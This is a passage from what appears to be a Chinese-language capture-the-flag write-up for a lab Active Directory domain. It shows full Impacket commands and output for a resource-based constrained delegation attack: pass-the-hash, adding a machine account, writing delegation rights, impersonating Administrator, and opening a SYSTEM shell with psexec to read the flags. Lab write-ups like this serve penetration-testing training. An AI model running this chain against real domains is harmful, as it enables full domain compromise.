userCertificate: MIIF6TCCBNGgAwIBAgITTgAAAAInxMyj8ylt/gAAAAAAAjANBgkqhkiG9w0BAQsFADBJMRMwEQYKCZImiZPyLGQBGRYDdGhsMRYwFAYKCZImiZPyLGQBGRYGc2hhZG93MRowGAYDVQQDExFzaGFkb3ctU0VFUlZFUi1DQTAeFw0yNjA2MjEyMjA4MTZaFw0yNzA2MjEyMjA4MTZaMB0xGzAZBgNVBAMTElNlZXJ2ZXIuc2hhZG93LnRobDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAJgKSdzVinL11j3OAhc0xsJmTqhTQH5NA1JVdY6fUidmVchm1ruqsypsvqfoks8qJsdF73abO3+dcWlmO0Siu5UA1SLab/aqgBZdA6FRH7I3albFAKNrw2dYmDshAkiMsxHGoXVDcnVC6Z98dFp/LMkJfjlmlMlaiJG5LZ0cBeTPg4IndmoARj6dVp8vU/+FhNO1g937oNiXP5h4eQhI8JZHtOL3/jYl4LTaVorzS5AEQMlMKnaXzCNmZ/nMghGXdUfFloQVMBvyg3V6c911neOiRI1qYdAJKJO4lNd1NyD+DNssGx8ZqMjepPV8y5ZlnSP/dRO155c/zCDsMXYxKo8CAwEAAaOCAvQwggLwMC8GCSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8AbABsAGUAcjAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/BAQDAgWgMHgGCSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3DQMEAgIAgDALBglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjALBglghkgBZQMEAQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFD+snGrwwqeUFcgfG6lP1W2M90O4MB8GA1UdIwQYMBaAFGK+FkLBPapBSosAMxDU4GXq0ZPvMIHOBgNVHR8EgcYwgcMwgcCggb2ggbqGgbdsZGFwOi8vL0NOPXNoYWRvdy1TRUVSVkVSLUNBLENOPVNlZXJ2ZXIsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9c2hhZG93LERDPXRobD9jZXJ0aWZpY2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlzdHJpYnV0aW9uUG9pbnQwgcIGCCsGAQUFBwEBBIG1MIGyMIGvBggrBgEFBQcwAoaBomxkYXA6Ly8vQ049c2hhZG93LVNFRVJWRVItQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9c2hhZG93LERDPXRobD9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTA+BgNVHREENzA1oB8GCSsGAQQBgjcZAaASBBDLHjbU1rYZSZwG08zRd9IoghJTZWVydmVyLnNoYWRvdy50aGwwDQYJKoZIhvcNAQELBQADggEBAF6fWiBabuz1J4u4K6xp1oXKjrakBCmcAdaFzh+25cRxlxJSb4DUJSeDHy1msofZuHxqi+r+AQAjaReVW9IiLfZbSg1C3AMn+2gCtGcLK4rntgvXB+eAMElIcIT9GfYv8hVW6TH4bhIzP0Lro4YFj5EAgB36qWr0gsYS0HtpOFHCiwqz73GIvY4NhoD0Ujicg59IcUTZqJt7rwVWmZiCS1NA/jDg8T+HO20e0MfWdDky3tWnwV3bAIWKLiWfVWg8NXfPvJItHqQR7XCm2wZh2mhkBcq4JkgUl43uD68HSsGGHH9KarAJWYsB8wqMi1wJBbir+5jz4ik7L3HOrJC4hPM=
whenChanged: 2026-07-12 01:52:50+00:00
whenCreated: 2026-06-15 11:44:02+00:00
接下来打 RBCD, 第一步:添加计算机账户
[/home/kali/temp]$ impacket-addcomputer -computer-name 'ATTACKERPC$' \
-computer-pass 'P@ssw0rd123!' \
-dc-host 192.168.237.138 \
-domain-netbios SHADOW \
shadow.thl/auditmgr \
-hashes ':98019215ea3bcb223dacec8fc12a71aa'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Successfully added machine account ATTACKERPC$ with password P@ssw0rd123!.
第二步:配置 RBCD
在目标机器的属性中写入一条信任记录
[/home/kali/temp]$ impacket-rbcd -delegate-from 'ATTACKERPC$' \
-delegate-to 'SEERVER$' \
-action 'write' \
-dc-ip 192.168.237.138 \
shadow.thl/auditmgr \
-hashes ':98019215ea3bcb223dacec8fc12a71aa'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] ATTACKERPC$ can now impersonate users on SEERVER$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] ATTACKERPC$ (S-1-5-21-2560516159-2044954141-282354372-2601)
第三步:获取服务票据
[/home/kali/temp]$ impacket-getST -spn 'cifs/SEERVER.shadow.thl' \
-impersonate 'Administrator' \
-dc-ip 192.168.237.138 \
shadow.thl/ATTACKERPC$:'P@ssw0rd123!'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
/usr/share/doc/python3-impacket/examples/getST.py:380: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py:477: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2self
/usr/share/doc/python3-impacket/examples/getST.py:607: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py:659: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_SEERVER.shadow.thl@SHADOW.THL.ccache
最后走 psexec 拿到 shell
[/home/kali/temp]$ export KRB5CCNAME=/home/kali/temp/Administrator@cifs_SEERVER.shadow.thl@SHADOW.THL.ccache
[/home/kali/temp]$ impacket-psexec -k -no-pass SEERVER.shadow.thl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on SEERVER.shadow.thl.....
[*] Found writable share ADMIN$
[*] Uploading file zTKlNsFp.exe
[*] Opening SVCManager on SEERVER.shadow.thl.....
[*] Creating service WMns on SEERVER.shadow.thl.....
[*] Starting service WMns.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> cd /users/administrator/desktop
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is E0CC-0727
Directory of C:\Users\Administrator\Desktop
06/18/2026 11:11 AM <DIR> .
06/18/2026 11:11 AM <DIR> ..
06/18/2026 09:50 AM 32 root.txt
06/18/2026 11:15 AM 32 user.txt
2 File(s) 64 bytes
2 Dir(s) 49,703,718,912 bytes free
C:\Users\Administrator\Desktop> type user.txt
0820ef
C:\Users\Administrator\Desktop> type root.txt
3dbef3
C:\Users\Administrator\Desktop>





